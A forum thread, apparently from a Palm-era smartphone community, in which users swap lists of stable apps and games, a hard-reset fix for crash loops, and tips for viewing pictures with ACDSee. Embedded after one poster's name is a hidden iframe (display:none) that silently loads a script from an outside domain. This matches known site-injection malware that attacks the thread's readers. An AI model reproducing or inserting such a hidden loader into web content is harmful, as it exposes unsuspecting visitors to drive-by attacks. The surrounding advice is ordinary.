+ Reply to Thread

safest apps to try geting first

I am concerned about the comments on messing with the rom on the phone to the point where its screwed and you have to send it in with demo apps etc, what is a good app to start with to try that is very safe? ringtones? Also can the phone out of the box play an mp3? sorry I am a bit clued working all weekend just got to toy with it, and i got two french manuals with my phone and am not bi-lengeual so gotta wait till monday to hopefuly get a swap of an english one.

Dreaderus<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think you need an SD card for the mp3 player to play songs. As for apps to run, I have been running without any trouble:

Directory Assistance (by our own rlwhitt)
    Astron (downloaded from either Handango or Palmgear)
    BJMentor (Blackjack odds tutor)
    X-Master
    OAG Mobile PQA
    Simcity
    Datebk5 (but I don't have any alarms set)
    Backupbuddy VFS

Obviously, I need to install some more apps now that I'm looking at this.
    ---------------
    The same thing we do every night, Pinky...

Well, I've installed a ton of software without getting one glitch. your mileage may vary of course.

LauncherX (read of some problems with the earlier firmware)
    Atomsmash
    Simcity
    Chessgenius
    Backupbuddy VFS
    ACDSee for palm (picture viewer)
    Easy calc
    MetrO (good city directory listing)
    YAUC (Yet another unit converter)
    3D hockey
    Billiards
    Hangman
    Pinballz

Yess.....I'm heavy into games

Verichat (highly recommended)
    Xiino
    X-Master
    Fatfingers
    Keyboard Hack
    Techsounds

And that's all for now

xcom

I have yet to be able to d/l some graphics, i want to show some graphics whats a good site to visit and do i need 3rd party software to launch it?

I have no manual atm they gave me 2 french manuals i have to go back to get a english manual today.

Dreaderus

Bizarre -- I also received 2 French manuals.

When I 1st picked up the phone I ended up in a vicious Soft Reset circle, I had to perform a Hard Reset, and then start dumping applications. The phone is now working great after I performed the following:

* Hard Reset
    * Delete Saved_Preferences.PDB, NetworkDB.PDB from Backup Dir
    * Delete these Apps: HackMaster (that hurt, but I noticed that I never saw the "Do you want to re-install Hacks message" after a soft reset (I would crash before that), so I assumed that HackMaster itself may have played a role in the crash. That means I also lost TealGlance & MagicText, 2 apps I really used alot. Also deleted Launch 'Em v3.1 and am currently using Mega Launcher with success.
    * Changed the Time Setting to manual (alot of my crashes seemed to occur on the Date/Time screen)
    * Always HotSync by touching the icon rather than the cradle button (this has eliminated the wierd "Port In Use" message that seemed to preceed some of my crashes).

The phone is now stable, I've experienced no crashes since... and I've run all types of applications.
    ~~~~
    Dave

* Delete these Apps: HackMaster (that hurt, but I noticed that I never saw the "Do you want to re-install Hacks message" after a soft reset (I would crash before that), so I assumed that HackMaster itself may have played a role in the crash. That means I also lost TealGlance & MagicText, 2 apps I really used alot. Also deleted Launch 'Em v3.1 and am currently using Mega Launcher with success.

Try X-Master. I am running it to control my hacks and have had no trouble with it.

I also got rid of launcher X. It wasn't so much that it caused crashes or resets (although every once in a while it did) as much as it made the ones that did occur worse (and more complicated to extricate myself from).

I am really happy with HBX, which launches from hard buttons.
    ---------------
    The same thing we do every night, Pinky...

Not sure what I put on my first 7135 that screwed it up so horribly, but I have several of the same programs on my replacement 7135 (real smart, huh?) and have suffered no problems:

Slap
    Facer
    Bejewelled!
    BigClock
    Filez
    MetrO
    datebk5
    dblicon+
    Contacts 4
    HappyDays

If you have SD card, you can put images directly into there. If not...I use ACDsee, which has a program on windows as well. You add pictures to it, it converts them to the palm screen, and next time you sync, the pictures will show up in it

it should still be here, at least the demo version : www.acdsee.com

Originally posted by Xc0m
    If you have SD card, you can put images directly into there. If not...I use ACDsee, which has a program on windows as well. You add pictures to it, it converts them to the palm screen, and next time you sync, the pictures will show up in it

it should still be here, at least the demo version : www.acdsee.com
    I just installed ACDSee and put a picture on my card. If I click on the category drop-down list, it only shows my handheld as an option. It doesn't recognize my card. Is there anything special that I have to do? BTW, I'm using the trial version.

Thanks,
    Mike

Originally posted by mikelawr
    I just installed ACDSee and put a picture on my card. If I click on the category drop-down list, it only shows my handheld as an option. It doesn't recognize my card. Is there anything special that I have to do? BTW, I'm using the trial version.

Thanks,
    Mike
    I found what I was doing wrong. Now my question is: Can the pictures on the card be stored anywhere other than the PALM/Launcher directory?

Thanks,
    Mike

Metro

Metro - Where do i get that from ? I cantfind it anywhere....Is it used based or will work anywhere ?